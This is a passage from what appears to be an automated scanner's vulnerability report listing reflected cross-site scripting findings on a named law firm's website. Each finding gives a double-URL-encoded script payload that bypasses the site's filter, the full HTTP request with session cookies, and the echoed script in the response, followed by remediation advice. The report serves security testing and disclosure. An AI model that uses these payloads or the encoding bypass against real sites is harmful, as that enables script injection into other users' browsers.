Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:14 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.accordion.cssa2a82"><script>alert(1)</script>b61ee3f3a8a" value="">
...[SNIP]...

4.158. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96 was submitted in the REST URL parameter 1. This input was echoed as 874a6"><script>alert(1)</script>bba185a7c96 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css874a6%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ebba185a7c96/ui/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css874a6"><script>alert(1)</script>bba185a7c96/ui/ui.all.css" value="">
...[SNIP]...

4.159. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989 was submitted in the REST URL parameter 2. This input was echoed as 3782d"><script>alert(1)</script>27d4aec5989 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui3782d%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e27d4aec5989/ui.all.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui3782d"><script>alert(1)</script>27d4aec5989/ui.all.css" value="">
...[SNIP]...

4.160. http://www.wileyrein.com/css/ui/ui.all.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.all.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 was submitted in the REST URL parameter 3. This input was echoed as c332a"><script>alert(1)</script>b48dfbd1665 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.all.cssc332a%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb48dfbd1665 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.all.cssc332a"><script>alert(1)</script>b48dfbd1665" value="">
...[SNIP]...

4.161. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde was submitted in the REST URL parameter 1. This input was echoed as 9aa04"><script>alert(1)</script>3f73509fbde in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css9aa04%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e3f73509fbde/ui/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:05 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css9aa04"><script>alert(1)</script>3f73509fbde/ui/ui.base.css" value="">
...[SNIP]...

4.162. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4 was submitted in the REST URL parameter 2. This input was echoed as a32e5"><script>alert(1)</script>b7ea1967ea4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uia32e5%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253eb7ea1967ea4/ui.base.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uia32e5"><script>alert(1)</script>b7ea1967ea4/ui.base.css" value="">
...[SNIP]...

4.163. http://www.wileyrein.com/css/ui/ui.base.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.base.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 was submitted in the REST URL parameter 3. This input was echoed as a4008"><script>alert(1)</script>674bcd1bc31 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.base.cssa4008%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e674bcd1bc31 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:07 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.base.cssa4008"><script>alert(1)</script>674bcd1bc31" value="">
...[SNIP]...

4.164. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f was submitted in the REST URL parameter 1. This input was echoed as cfd19"><script>alert(1)</script>32dc5bc06f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /csscfd19%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e32dc5bc06f/ui/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:44 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/csscfd19"><script>alert(1)</script>32dc5bc06f/ui/ui.core.css" value="">
...[SNIP]...

4.165. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb was submitted in the REST URL parameter 2. This input was echoed as cac63"><script>alert(1)</script>5d010f954eb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uicac63%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e5d010f954eb/ui.core.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uicac63"><script>alert(1)</script>5d010f954eb/ui.core.css" value="">
...[SNIP]...

4.166. http://www.wileyrein.com/css/ui/ui.core.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.core.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 was submitted in the REST URL parameter 3. This input was echoed as c6878"><script>alert(1)</script>49980770f59 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.core.cssc6878%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e49980770f59 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:45 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.core.cssc6878"><script>alert(1)</script>49980770f59" value="">
...[SNIP]...

4.167. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23 was submitted in the REST URL parameter 1. This input was echoed as fbf73"><script>alert(1)</script>f798e920d23 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /cssfbf73%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ef798e920d23/ui/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:53 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/cssfbf73"><script>alert(1)</script>f798e920d23/ui/ui.datepicker.css" value="">
...[SNIP]...

4.168. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b was submitted in the REST URL parameter 2. This input was echoed as b6749"><script>alert(1)</script>54913b0be8b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/uib6749%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e54913b0be8b/ui.datepicker.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:54 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/uib6749"><script>alert(1)</script>54913b0be8b/ui.datepicker.css" value="">
...[SNIP]...

4.169. http://www.wileyrein.com/css/ui/ui.datepicker.css [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.datepicker.css

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 was submitted in the REST URL parameter 3. This input was echoed as 45672"><script>alert(1)</script>4f4fe8f9220 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui/ui.datepicker.css45672%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253e4f4fe8f9220 HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:55 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css/ui/ui.datepicker.css45672"><script>alert(1)</script>4f4fe8f9220" value="">
...[SNIP]...

4.170. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f was submitted in the REST URL parameter 1. This input was echoed as 36a08"><script>alert(1)</script>cbd401dfa0f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css36a08%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ecbd401dfa0f/ui/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:15 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head>

   
<link rel="alternate" type="application/rss+xm
...[SNIP]...
<input type="hidden" name="404;http://www.wileyrein.com:80/css36a08"><script>alert(1)</script>cbd401dfa0f/ui/ui.dialog.css" value="">
...[SNIP]...

4.171. http://www.wileyrein.com/css/ui/ui.dialog.css [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.wileyrein.com
Path:   /css/ui/ui.dialog.css

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49 was submitted in the REST URL parameter 2. This input was echoed as 8c042"><script>alert(1)</script>e88d9eeae49 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /css/ui8c042%2522%253e%253cscript%253ealert%25281%2529%253c%252fscript%253ee88d9eeae49/ui.dialog.css HTTP/1.1
Host: www.wileyrein.com
Proxy-Connection: keep-alive
Referer: http://www.wileyrein.com/
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CFID=18263656; CFTOKEN=43582841

Response

HTTP/1.1 200 OK
Connection: close
Date: Wed, 19 Jan 2011 15:12:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Content-Type: text/html; charset=UTF-8


